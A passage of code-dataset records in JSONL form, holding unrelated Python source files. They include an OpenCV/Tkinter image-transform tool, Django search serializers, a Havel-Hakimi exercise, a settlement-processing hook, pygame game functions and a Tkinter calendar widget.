f2]])\n\t\t\tM = cv2.getAffineTransform (pts1, pts2)\n\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\t\t\tif s == 1:\n\t\t\t\tim = cv2.warpAffine (img, M, (rows, cols))\n\n\t\tcv2.destroyAllWindows()\n\n\tdef onPerspect (self):\n\t\tim = img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Perspect', cv2.WINDOW_NORMAL)\n\n\t\tcv2.createTrackbar('a1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('a2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('b1', 'Perspect', 0, 255, self.nothing) \n\t\tcv2.createTrackbar('b2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('c1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('c2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('d1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('d2', 'Perspect', 0, 255, self.nothing)\n\n\t\tcv2.createTrackbar('e1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('e2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('f1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('f2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('g1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('g2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('h1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('h2', 'Perspect', 0, 255, self.nothing)\n\n\t\tcv2.createTrackbar('row', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('col', 'Perspect', 0, 255, self.nothing) \n\n\t\tswitch = \"0: OFF\" + \"\\n1: Perspective\"\n\t\tcv2.createTrackbar(switch, 'Perspect', 0, 1, self.nothing)\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\t\tbreak\n\n\t\t\ta1 = cv2.getTrackbarPos ('a1', 'Perspect')\n\t\t\ta2 = cv2.getTrackbarPos ('a2', 'Perspect')\n\t\t\tb1 = cv2.getTrackbarPos ('b1', 'Perspect')\n\t\t\tb2 = cv2.getTrackbarPos ('b1', 'Perspect')\n\t\t\tc1 = cv2.getTrackbarPos ('c1', 'Perspect')\n\t\t\tc2 = cv2.getTrackbarPos ('c2', 'Perspect')\n\t\t\td1 = cv2.getTrackbarPos ('d1', 'Perspect')\n\t\t\td2 = cv2.getTrackbarPos ('d2', 'Perspect')\n\n\t\t\te1 = cv2.getTrackbarPos ('e1', 'Perspect')\n\t\t\te2 = cv2.getTrackbarPos ('e2', 'Perspect')\n\t\t\tf1 = cv2.getTrackbarPos ('f1', 'Perspect')\n\t\t\tf2 = cv2.getTrackbarPos ('f2', 'Perspect')\n\t\t\tg1 = cv2.getTrackbarPos ('g1', 'Perspect')\n\t\t\tg2 = cv2.getTrackbarPos ('g2', 'Perspect')\n\t\t\th1 = cv2.getTrackbarPos ('h1', 'Perspect')\n\t\t\th2 = cv2.getTrackbarPos ('h2', 'Perspect')\n\n\t\t\ti1 = cv2.getTrackbarPos ('row', 'Perspect')\n\t\t\ti2 = cv2.getTrackbarPos ('col', 'Perspect')\n\n\t\t\ts = cv2.getTrackbarPos (switch, 'Perspect')\n\n\t\t\t#số liệu cho Perspective\n\t\t\tpts3 = np.float32([[a1, a2], [b1, b2], [c1, c2], [d1, d2]])\n\t\t\tpts4 = np.float32([[e1, e2], [f1, f2], [g1, g2], [h1, h2]])\n\t\t\tM = cv2.getPerspectiveTransform (pts3, pts4)\n\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\t\t\tif s == 1:\n\t\t\t\tim = cv2.warpPerspective (img, M, (i1, i2))\n\n\t\tcv2.destroyAllWindows()\n\n\tdef onApply (self):\n\t\tcv2.namedWindow('Real', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Face', cv2.WINDOW_NORMAL)\n\n\t\tface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\t\tfaces = face_cascade.detectMultiScale(img, scaleFactor = 1.337, minNeighbors = 6, minSize = (30, 30))\n\t\tnumber = len(faces)\n\n\t\tim = np.zeros((300, 300, 3), np.uint8)\n\n\t\tcv2.createTrackbar('Faces', 'Face', 0, number - 1, self.nothing) \n\t\tcv2.createTrackbar('Switch', 'Face', 0, 1, self.nothing) \n\n\t\twhile(1):\n\n\t\t\ti = cv2.getTrackbarPos ('Faces', 'Face')\n\t\t\ts = cv2.getTrackbarPos ('Switch', 'Face')\n\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\t\t\tif s == 1:\n\t\t\t\tx, y, w, h = faces[i] \n\n\t\t\t\tpts3 = np.float32([[x, y], [x + w, y], [x, y + h], [x + w, y + h]])\n\t\t\t\tpts4 = np.float32([[0, 0], [w, 0], [0, h], [w, h]])\n\t\t\t\tM = cv2.getPerspectiveTransform (pts3, pts4)\n\n\t\t\t\tim = cv2.warpPerspective (img, M, (w, h))\n\t\t\t\n\t\t\tcv2.imshow(\"Face\", im)\n\t\t\tcv2.imshow('Real', img)\n\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\tbreak\n\t\t\t\n\t\tcv2.destroyAllWindows()\n\nroot = Tk()\nroot.geometry(\"400x408+750+100\")\n# root.configure(background = 'blue') #chỉnh sửa màu nền\napp = BTL(root)\nroot.mainloop()","sub_path":"BTL.py","file_name":"BTL.py","file_ext":"py","file_size_in_byte":12199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"570101406","text":"from datetime import datetime\n\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\n\nfrom rest_framework import serializers\n\nimport amo\nimport mkt\nfrom amo.helpers import absolutify\nfrom constants.applications import DEVICE_TYPES\nfrom mkt.api.fields import ESTranslationSerializerField\nfrom mkt.submit.serializers import SimplePreviewSerializer\nfrom mkt.versions.models import Version\nfrom mkt.webapps.models import Category, Geodata, Preview, Webapp\nfrom mkt.webapps.serializers import AppSerializer, SimpleAppSerializer\nfrom mkt.webapps.utils import (dehydrate_content_rating, dehydrate_descriptors,\n dehydrate_interactives)\n\n\nclass ESAppSerializer(AppSerializer):\n # Fields specific to search.\n absolute_url = serializers.SerializerMethodField('get_absolute_url')\n reviewed = serializers.DateField()\n\n # Override previews, because we don't need the full PreviewSerializer.\n previews = SimplePreviewSerializer(many=True, source='all_previews')\n\n # Override those, because we want a different source. Also, related fields\n # will call self.queryset early if they are not read_only, so force that.\n categories = serializers.SlugRelatedField(read_only=True,\n many=True, slug_field='slug', source='all_categories')\n manifest_url = serializers.CharField(source='manifest_url')\n package_path = serializers.SerializerMethodField('get_package_path')\n\n # Override translations, because we want a different field.\n banner_message = ESTranslationSerializerField(\n source='geodata.banner_message')\n description = ESTranslationSerializerField()\n homepage = ESTranslationSerializerField()\n name = ESTranslationSerializerField()\n release_notes = ESTranslationSerializerField(\n source='current_version.releasenotes')\n support_email = ESTranslationSerializerField()\n support_url = ESTranslationSerializerField()\n\n class Meta(AppSerializer.Meta):\n fields = AppSerializer.Meta.fields + ['absolute_url', 'reviewed']\n\n def __init__(self, *args, **kwargs):\n super(ESAppSerializer, self).__init__(*args, **kwargs)\n\n # Remove fields that we don't have in ES at the moment.\n self.fields.pop('upsold', None)\n\n # Set all fields as read_only just in case.\n for field_name in self.fields:\n self.fields[field_name].read_only = True\n\n @property\n def data(self):\n \"\"\"\n Returns the serialized data on the serializer.\n \"\"\"\n if self._data is None:\n if self.many:\n self._data = [self.to_native(item) for item in self.object]\n else:\n self._data = self.to_native(self.object)\n return self._data\n\n def field_to_native(self, obj, field_name):\n # DRF's field_to_native calls .all(), which we want to avoid, so we\n # provide a simplified version that doesn't and just iterates on the\n # object list.\n return [self.to_native(item) for item in obj.object_list]\n\n def to_native(self, obj):\n app = self.create_fake_app(obj._source)\n return super(ESAppSerializer, self).to_native(app)\n\n def create_fake_app(self, data):\n \"\"\"Create a fake instance of Webapp and related models from ES data.\"\"\"\n is_packaged = data['app_type'] != amo.ADDON_WEBAPP_HOSTED\n is_privileged = data['app_type'] == amo.ADDON_WEBAPP_PRIVILEGED\n\n obj = Webapp(id=data['id'], app_slug=data['app_slug'],\n is_packaged=is_packaged, type=amo.ADDON_WEBAPP,\n icon_type='image/png')\n\n # Set relations and attributes we need on those relations.\n # The properties set on latest_version and current_version differ\n # because we are only setting what the serializer is going to need.\n # In particular, latest_version.is_privileged needs to be set because\n # it's used by obj.app_type_id.\n obj.listed_authors = []\n obj._current_version = Version()\n obj._current_version.addon = obj\n obj._current_version._developer_name = data['author']\n obj._current_version.supported_locales = data['supported_locales']\n obj._current_version.version = data['current_version']\n obj._latest_version = Version()\n obj._latest_version.is_privileged = is_privileged\n obj._geodata = Geodata()\n obj.all_categories = [Category(slug=cat) for cat in data['category']]\n obj.all_previews = [Preview(id=p['id'], modified=p['modified'],\n filetype=p['filetype']) for p in data['previews']]\n obj._device_types = [DEVICE_TYPES[d] for d in data['device']]\n\n # Set base attributes on the \"fake\" app using the data from ES.\n # It doesn't mean they'll get exposed in the serializer output, that\n # depends on what the fields/exclude attributes in Meta.\n for field_name in ('created', 'modified', 'default_locale',\n 'icon_hash', 'is_escalated', 'is_offline',\n 'manifest_url', 'premium_type', 'regions',\n 'reviewed', 'status', 'weekly_downloads'):\n setattr(obj, field_name, data.get(field_name))\n\n # Attach translations for all translated attributes.\n for field_name in ('name', 'description', 'homepage', 'support_email',\n 'support_url'):\n ESTranslationSerializerField.attach_translations(obj,\n data, field_name)\n ESTranslationSerializerField.attach_translations(obj._geodata,\n data, 'banner_message')\n ESTranslationSerializerField.attach_translations(obj._current_version,\n data, 'release_notes', target_name='releasenotes')\n\n # Set attributes that have a different name in ES.\n obj.public_stats = data['has_public_stats']\n\n # Override obj.get_region() with a static list of regions generated\n # from the region_exclusions stored in ES.\n obj.get_regions = obj.get_regions(obj.get_region_ids(restofworld=True,\n excluded=data['region_exclusions']))\n\n # Some methods below will need the raw data from ES, put it on obj.\n obj.es_data = data\n\n return obj\n\n def get_content_ratings(self, obj):\n body = (mkt.regions.REGION_TO_RATINGS_BODY().get(\n self.context['request'].REGION.slug, 'generic'))\n return {\n 'body': body,\n 'rating': dehydrate_content_rating(\n (obj.es_data.get('content_ratings') or {})\n .get(body)) or None,\n 'descriptors': dehydrate_descriptors(\n obj.es_data.get('content_descriptors', {})\n ).get(body, []),\n 'interactives': dehydrate_interactives(\n obj.es_data.get('interactive_elements', [])),\n }\n\n def get_versions(self, obj):\n return dict((v['version'], v['resource_uri'])\n for v in obj.es_data['versions'])\n\n def get_ratings_aggregates(self, obj):\n return obj.es_data.get('ratings', {})\n\n def get_upsell(self, obj):\n upsell = obj.es_data.get('upsell', False)\n if upsell:\n region_id = self.context['request'].REGION.id\n exclusions = upsell.get('region_exclusions')\n if exclusions is not None and region_id not in exclusions:\n upsell['resource_uri'] = reverse('app-detail',\n kwargs={'pk': upsell['id']})\n else:\n upsell = False\n return upsell\n\n def get_absolute_url(self, obj):\n return absolutify(obj.get_absolute_url())\n\n def get_package_path(self, obj):\n return obj.es_data.get('package_path')\n\n def get_tags(self, obj):\n return obj.es_data['tags']\n\n\nclass SimpleESAppSerializer(ESAppSerializer):\n\n class Meta(SimpleAppSerializer.Meta):\n pass\n\n\nclass SuggestionsESAppSerializer(ESAppSerializer):\n icon = serializers.SerializerMethodField('get_icon')\n\n class Meta(ESAppSerializer.Meta):\n fields = ['name', 'description', 'absolute_url', 'icon']\n\n def get_icon(self, app):\n return app.get_icon_url(64)\n\n\nclass RocketbarESAppSerializer(serializers.Serializer):\n \"\"\"Used by Firefox OS's Rocketbar apps viewer.\"\"\"\n name = ESTranslationSerializerField()\n\n @property\n def data(self):\n if self._data is None:\n self._data = [self.to_native(o['payload']) for o in self.object]\n return self._data\n\n def to_native(self, obj):\n # fake_app is a fake instance because we need to access a couple\n # properties and methods on Webapp. It should never hit the database.\n self.fake_app = Webapp(\n id=obj['id'], icon_type='image/png', type=amo.ADDON_WEBAPP,\n default_locale=obj.get('default_locale', settings.LANGUAGE_CODE),\n icon_hash=obj.get('icon_hash'),\n modified=datetime.strptime(obj['modified'], '%Y-%m-%dT%H:%M:%S'))\n ESTranslationSerializerField.attach_translations(\n self.fake_app, obj, 'name')\n return {\n 'name': self.fields['name'].field_to_native(self.fake_app, 'name'),\n 'icon': self.fake_app.get_icon_url(64),\n 'slug': obj['slug'],\n 'manifest_url': obj['manifest_url'],\n }\n\n\nclass RocketbarESAppSerializerV2(AppSerializer, RocketbarESAppSerializer):\n \"\"\"\n Replaced `icon` key with `icons` for various pixel sizes: 128, 64, 48, 32.\n \"\"\"\n\n def to_native(self, obj):\n data = super(RocketbarESAppSerializerV2, self).to_native(obj)\n del data['icon']\n data['icons'] = self.get_icons(self.fake_app)\n return data\n","sub_path":"mkt/search/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":9697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"426128609","text":"\ndef warm1(list):\n\twhile 0 in list:\n\t\tlist.remove(0)\n\treturn list\ndef warm2(list):\n\tlist.sort(reverse = True)\n\treturn list\ndef warm3(list, N):\n\tif(N >= len(list)):\n\t\treturn True\n\telse:\n\t\treturn False\ndef warm4(list, N):\n\tfor i in range(N):\n\t\tlist[i] -= 1\n\treturn list\n\t\ndef HH(list):\n\twarm1(list)\n\tif(len(list) == 0):\n\t\treturn True\t\t\n\twarm2(list)\n\tN = list.pop(0)\n\tif (warm3(list, N) == True):\n\t\treturn False\n\twarm4(list)\n\treturn HH(list)\nnums = [5, 3, 0, 2, 6, 2, 0, 7, 2, 5]\nprint(HH(nums))\n\t\t\n\t\n","sub_path":"Havel_Hakimi.py","file_name":"Havel_Hakimi.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"282736810","text":"\"\"\"--------------------------------------------------------------------------------------------------------------------------------------\nMODULE\n TermMaturityInstructionSTPHook\n\nDESCRIPTION\n This module contains a hook for STP (straight-through-processing) triggered\n by the setting of a maturity instruction on a term deposit.\n\n-----------------------------------------------------------------------------------------------------------------------------------------\nHISTORY\n=========================================================================================================================================\nDate Change no Developer Requester Description\n-----------------------------------------------------------------------------------------------------------------------------------------\n2019-04-18 FAOPS-425 Cuen Edwards Kgomotso Gumbo Behaviour migrated from trade instruction tool with minor\n improvements.\n-----------------------------------------------------------------------------------------------------------------------------------------\n\"\"\"\n\nimport acm\n\nimport OperationsSTPFunctions\nfrom at_logging import getLogger\nfrom OperationsSTPHook import OperationsSTPHook\n\n\nLOGGER = getLogger(__name__)\n\n\nclass TermMaturityInstructionSTPHook(OperationsSTPHook):\n \"\"\"\n Definition of a hook used to perform STP triggered by the\n setting of a maturity instruction on a term deposit.\n \"\"\"\n\n def Name(self):\n \"\"\"\n Get the name of the Operations STP Hook.\n \"\"\"\n return 'Term Maturity Instruction STP Hook'\n\n def IsTriggeredBy(self, eventObject):\n \"\"\"\n Determine whether or not to trigger the hooks STP action/s\n for an event on the specified object.\n \"\"\"\n if not eventObject.IsKindOf(acm.FInstrument):\n return False\n instrument = eventObject\n if instrument.InsType() not in ['Deposit', 'FRN']:\n return False\n if instrument.IsCallAccount():\n return False\n if instrument.ExpiryDateOnly() != acm.Time.DateToday():\n return False\n return True\n\n def PerformSTP(self, instrument):\n \"\"\"\n Perform the hooks STP action/s for an event on the specified\n object.\n\n Please note that the action does not necessarily occur to the\n event object itself but may occur to some related object/s.\n \"\"\"\n maturing_cash_flows = self.get_maturing_cash_flows(instrument)\n if not maturing_cash_flows:\n LOGGER.info('No maturing cash flows found, skipping.')\n return\n for cash_flow in maturing_cash_flows:\n if cash_flow.CashFlowType() not in ['Fixed Amount', 'Fixed Rate', 'Float Rate']:\n message = \"Maturing cash flow {cash_flow_oid} of type '{cash_flow_type}' found, skipping.\"\n LOGGER.info(message.format(\n cash_flow_oid=cash_flow.Oid(),\n cash_flow_type=cash_flow.CashFlowType()\n ))\n continue\n settle_type_addinfo_name = 'Settle_Type'\n settle_type = cash_flow.AddInfoValue(settle_type_addinfo_name)\n if not settle_type:\n message = \"Additional info '{addinfo_name}' not set on maturing cash flow {cash_flow_oid}, \"\n message += \"skipping.\"\n LOGGER.info(message.format(\n addinfo_name=settle_type_addinfo_name,\n cash_flow_oid=cash_flow.Oid()\n ))\n continue\n settlements = self._get_cash_flow_settlements(cash_flow)\n if not settlements:\n LOGGER.info('No settlements found for maturing cash flow {cash_flow_oid}, skipping.'.format(\n cash_flow_oid=cash_flow.Oid()\n ))\n continue\n for settlement in settlements:\n if settlement.Status() not in ['Authorised', 'Exception']:\n message = \"Settlement {settlement_oid} for maturing cash flow {cash_flow_oid} not in \"\n message += \"'Authorised' or 'Exception' status, skipping.\"\n LOGGER.info(message.format(\n settlement_oid=settlement.Oid(),\n cash_flow_oid=cash_flow.Oid()\n ))\n continue\n settle_instruct_addinfo_name = 'Settle_Instruct'\n current_settle_instruct = settlement.AddInfoValue(settle_instruct_addinfo_name)\n if current_settle_instruct:\n message = \"Settlement {settlement_oid} for maturing cash flow {cash_flow_oid} already \"\n message += \"has additional info '{addinfo_name}' set, skipping.\"\n LOGGER.info(message.format(\n settlement_oid=settlement.Oid(),\n cash_flow_oid=cash_flow.Oid(),\n addinfo_name=settle_instruct_addinfo_name\n ))\n continue\n LOGGER.info('Processing settlement {settlement_oid} for maturing cash flow {cash_flow_oid}.'.format(\n settlement_oid=settlement.Oid(),\n cash_flow_oid=cash_flow.Oid()\n ))\n settlement = settlement.StorageImage()\n # Set Settle_Instruct.\n OperationsSTPFunctions.set_additional_info_value(settlement, settle_instruct_addinfo_name, settle_type)\n # Set Sett_Status_Update.\n OperationsSTPFunctions.set_additional_info_value(settlement, 'Sett_Status_Update', True)\n # Set Settle Amount (if specified).\n settle_amount = cash_flow.AddInfoValue('Settle_Amount')\n if settle_amount:\n OperationsSTPFunctions.set_additional_info_value(settlement, 'Partial_Amount', settle_amount)\n # Hold settlement if applicable.\n if self._should_hold_settlement(settlement, settle_type):\n self._hold_settlement(settlement)\n settlement.Commit()\n\n def get_maturing_cash_flows(self, instrument):\n \"\"\"\n Get any cash flows maturing (paying out) today.\n \"\"\"\n maturing_cash_flows = list()\n today = acm.Time.DateToday()\n for cash_flow in instrument.MainLeg().CashFlows().AsArray():\n if cash_flow.PayDate() != today:\n continue\n maturing_cash_flows.append(cash_flow)\n return maturing_cash_flows\n\n def _get_cash_flow_settlements(self, cash_flow):\n \"\"\"\n Get any settlements for a cash flow.\n \"\"\"\n select_expression = 'cashFlow = {cash_flow_oid}'.format(\n cash_flow_oid=cash_flow.Oid()\n )\n return acm.FSettlement.Select(select_expression).AsArray()\n\n def _should_hold_settlement(self, settlement, settle_type):\n \"\"\"\n Determine whether or not a settle_type value should result in\n a settlement being set to hold.\n \"\"\"\n if settlement.Status() != 'Authorised':\n return False\n cash_flow_type = settlement.CashFlow().CashFlowType()\n if cash_flow_type == 'Fixed Amount':\n return self._should_hold_capital_settlement(settle_type)\n elif cash_flow_type in ['Fixed Rate', 'Float Rate']:\n return self._should_hold_interest_settlement(settle_type)\n raise ValueError(\"Unsupported settlement for cash flow type '{cash_flow_type}' specified.\".format(\n cash_flow_type=cash_flow_type\n ))\n\n def _should_hold_capital_settlement(self, settle_type):\n \"\"\"\n Determine whether or not to hold a capital settlement for a\n specified settle_type.\n \"\"\"\n return settle_type in [\n \"Term To Term: Capital and Interest\",\n \"Term To Term: Capital\",\n \"Term To Term: Partial Capital and Interest\",\n \"Term To Term: Partial Capital\",\n \"Term To Call: Capital and Interest\",\n \"Term To Call: Capital\",\n \"Term To Call: Partial Capital and Interest\",\n \"Term To Call: Partial Capital\",\n \"Term To Multiple\",\n \"Pay Out : Interest\"\n ]\n\n def _should_hold_interest_settlement(self, settle_type):\n \"\"\"\n Determine whether or not to hold a interest settlement for a\n specified settle_type\n \"\"\"\n return settle_type in [\n \"Term To Term: Capital and Interest\",\n \"Term To Term: Interest\",\n \"Term To Term: Partial Capital and Interest\",\n \"Term To Call: Capital and Interest\",\n \"Term To Call: Interest\",\n \"Term To Call: Partial Capital and Interest\",\n \"Term To Multiple\",\n \"Pay Out : Capital\"\n ]\n\n def _hold_settlement(self, settlement):\n \"\"\"\n Change the status of a settlement to hold.\n \"\"\"\n LOGGER.info('Holding settlement {settlement_oid}.'.format(\n settlement_oid=settlement.OriginalOrSelf().Oid()\n ))\n settlement.Status('Hold')\n","sub_path":"Extensions/ABSA Operations STP/FPythonCode/TermMaturityInstructionSTPHook.py","file_name":"TermMaturityInstructionSTPHook.py","file_ext":"py","file_size_in_byte":9303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"584650786","text":"import sys\n\nimport pygame\nfrom bullet import Bullet\nfrom alien import Alien\n\ndef check_events(ai_settings, screen, ship, bullets):\n \"\"\"Respond to keypresses and mouse events.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ai_settings, screen, ship, bullets)\n\ndef update_screen(ai_settings, screen, ship, alien, bullets):\n \"\"\"Update images on the screen and flip the new screen.\"\"\"\n # Redraw the screen during each pass through the loop.\n screen.fill(ai_settings.bg_color)\n ship.blitme()\n alien.draw(screen)\n\n # Redraw all bullets behind ship and aliens.\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n # Make the most recently drawn screen visible.\n pygame.display.flip()\n\ndef update_bullets(bullets):\n \"\"\"Update position of bullets and gir rid of old bullets\"\"\"\n # Update bullets positions.\n bullets.update()\n\n # Get rid of bullets that have disappeard.\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\n \"\"\"Respond to key presses\"\"\"\n if event.key == pygame.K_d:\n # Move the ship to the right.\n ship.moving_right = True\n elif event.key == pygame.K_a:\n # Move the ship to the left.\n ship.moving_left = True\n elif event.key == pygame.K_SPACE:\n # Create a new bullet and add it to the bullets group.\n if len(bullets) < ai_settings.bullet_limit:\n fire_bullets(ai_settings, screen, ship, bullets)\n\ndef check_keyup_events(event, ai_settings, screen, ship, bullets):\n \"\"\"Respond to key releases\"\"\"\n if event.key == pygame.K_d:\n # Stop ship from going right\n ship.moving_right = False\n elif event.key == pygame.K_a:\n # Stop ship from going left\n ship.moving_left = False\n\ndef fire_bullets(ai_settings, screen, ship, bullets):\n new_bullet = Bullet(ai_settings, screen, ship, 'left')\n bullets.add(new_bullet)\n new_bullet = Bullet(ai_settings, screen, ship, 'right')\n bullets.add(new_bullet)\n\ndef create_fleet(ai_settings, screen, aliens):\n \"\"\"Create a full fleet of aliens.\"\"\"\n # Create an alien and find the number aliens in a row.\n alien = Alien(ai_settings, screen)\n number_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\n\n for alien_number in range(number_aliens_x):\n create_alien(ai_settings, screen, aliens, alien_number)\n\ndef get_number_aliens_x(ai_settings, alien_width):\n available_space_x = ai_settings.screen_width - 2 * alien_width\n number_aliens_x = int(available_space_x / (2 * alien_width))\n return number_aliens_x\n\ndef create_alien(ai_settings, screen, aliens, alien_number):\n alien = Alien(ai_settings, screen)\n alien_width = alien.rect.width\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n aliens.add(alien)\n","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"387085785","text":"from tkinter import *\r\nimport tkinter as tk\r\nimport time\r\nimport pandas as pd\r\n\r\nclass CalendarWidget():\r\n def __init__(self, startTime):\r\n # 프레임 상단에 표시되는 요일의 약어\r\n self.dayAbbreviations = (\"Mo\", \"Tu\", \"We\", \"Th\", \"Fr\", \"Sa\", \"Su\")\r\n\r\n self.dayPositions = {\r\n \"Monday\": 1,\r\n \"Tuesday\":2,\r\n \"Wednesday\": 3,\r\n \"Thursday\": 4,\r\n \"Friday\": 5,\r\n \"Saturday\": 6,\r\n \"Sunday\": 7,\r\n }\r\n\r\n # 루트 창 대신 최상위 수준으로 창을 만들면 모든 프로젝트에서 작동\r\n\r\n self.calendarWindow = tk.Toplevel()\r\n self.calendarWindow.wm_resizable(0, 0)\r\n self.calendarWindow.title(\"Select Date\")\r\n self.calendarWindow.config(padx=5, pady=5)\r\n self.calendarWindow.rowconfigure(0, weight=1)\r\n\r\n self.calendarFrame = tk.LabelFrame()\r\n self.calendarFrame.destroy()\r\n\r\n photoFrame = tk.Frame(self.calendarWindow)\r\n photoFrame.pack(side = tk.TOP)\r\n buttonsFrame = tk.Frame(self.calendarWindow)\r\n buttonsFrame.pack(side=tk.BOTTOM, fill=tk.X, expand=1)\r\n\r\n #gif 사진 첨부\r\n photo = PhotoImage(file=\"C:\\Python\\python1\\good.gif\")\r\n r = Label( photoFrame, image=photo)\r\n r.photo = photo\r\n r.pack()\r\n\r\n # 이전 및 다음 버튼 만들기\r\n tk.Button(buttonsFrame, text=\"< Prev\", command=self.previousMonth).pack(side=tk.LEFT)\r\n tk.Button(buttonsFrame, text=\"Next >\", command=self.nextMonth).pack(side=tk.RIGHT)\r\n tk.Button(buttonsFrame, text=\"생일리스트\", command=self.popup).pack(side=tk.RIGHT)\r\n\r\n # 현재 달에서 시작된 캘린더를 초기화\r\n self.initializeCalendarUI(round(startTime))\r\n\r\n def initializeCalendarUI(self, startTime):\r\n\r\n # find the first day of the month\r\n dayNum = int(time.strftime(\"%d\", time.localtime(startTime)))\r\n self.currentTime = startTime - (dayNum * 86400) + 86400\r\n print(time.strftime(\"%d %B %A\", time.localtime(self.currentTime)))\r\n\r\n\r\n self.currentMonth = time.strftime(\"%m\", time.localtime(self.currentTime))\r\n # 28 일보다 더 짧은 달이 없기 때문에 인덱스 27에서 시작\r\n\r\n monthLength = 27\r\n for i in range(5):\r\n _t = self.currentTime + (86400 * (i + 27))\r\n print(time.strftime(\"%B\", time.localtime(_t)))\r\n if time.strftime(\"%m\", time.localtime(_t)) != self.currentMonth:\r\n print(monthLength)\r\n break\r\n monthLength += 1\r\n\r\n # 이제 우리는 시작일과 달의 길이를 가지므로 달력을 올바르게 생성\r\n try:\r\n if (self.calendarFrame.winfo_exists() == True):\r\n self.calendarFrame.destroy()\r\n except Exception:\r\n print(\"Ignoring \" + str(Exception) + \", first time calendarFrame is being created\")\r\n\r\n self.calendarFrame = tk.LabelFrame(self.calendarWindow,\r\n text=time.strftime(\"%B %Y\", time.localtime(self.currentTime)))\r\n self.calendarFrame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\r\n\r\n # 프레임 상단에 초기 약어 레이블 생성\r\n for index, i in enumerate(self.dayAbbreviations):\r\n _t = tk.Frame(self.calendarFrame)\r\n _t.grid(column=index + 1, row=0)\r\n tk.Label(_t, text=i).grid(column=1, row=1)\r\n\r\n # 순간에 사용될 리턴 함수를 정의\r\n # 시간 모듈로 문자열로 변환\r\n def buttonFunction(returnTime):\r\n return_time = self.currentTime + (86400 * returnTime)\r\n print(return_time)\r\n print(time.strftime(\"%A %d %B %Y\", time.localtime(return_time)))\r\n self.calendarWindow.destroy()\r\n\r\n # Create all the buttons\r\n row = 1\r\n for i in range(monthLength):\r\n _d = time.localtime(self.currentTime + (86400 * i))\r\n _day = time.strftime(\"%A\", _d)\r\n\r\n\r\n tk.Button(self.calendarFrame, text=(i + 1), command=lambda i=i: buttonFunction(i)).grid(\r\n column=self.dayPositions[_day], row=row, sticky=tk.N + tk.E + tk.W + tk.S)\r\n if self.dayPositions[_day] == 7:\r\n row += 1\r\n\r\n for i in range(7):\r\n self.calendarFrame.columnconfigure(i + 1, weight=1)\r\n for i in range(5):\r\n self.calendarFrame.rowconfigure(i + 1, weight=1)\r\n\r\n # 새 달을 앞으로 스캔하여 다음 달로 이동\r\n def nextMonth(self):\r\n for i in range(32):\r\n _c = time.strftime(\"%m\", time.localtime(self.currentTime + (86400 * i)))\r\n if _c != self.currentMonth:\r\n self.currentTime += 86400 * i\r\n self.initializeCalendarUI(self.currentTime)\r\n break\r\n\r\n #새 달을 앞으로 스캔하여 이전 달로 이동\r\n def previousMonth(self):\r\n for i in range(32):\r\n _c = time.strftime(\"%m\", time.localtime(self.currentTime - (86400 * i)))\r\n if _c != self.currentMonth:\r\n self.currentTime -= 86400 * i\r\n self.initializeCalendarUI(self.currentTime)\r\n break\r\n\r\n def popup(self):\r\n data = pd.read_csv(\"C:\\Python\\python1\\sheet.csv\")\r\n print(data)\r\n\r\n\r\nclass GUI():\r\n def __init__(self):\r\n self.root = tk.Tk()\r\n tk.Button(self.root, text=\"Show Calendar\", command=lambda: CalendarWidget(time.time())).pack(side=tk.TOP)\r\n\r\n\r\n\r\nnew = GUI()\r\nnew.root.mainloop()","sub_path":"naeyoungTest2.py","file_name":"naeyoungTest2.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"394397662","text":"import json\nimport requests\n\n\ndef load_carto_credentials(filepath):\n \"\"\"Load credentials from file. 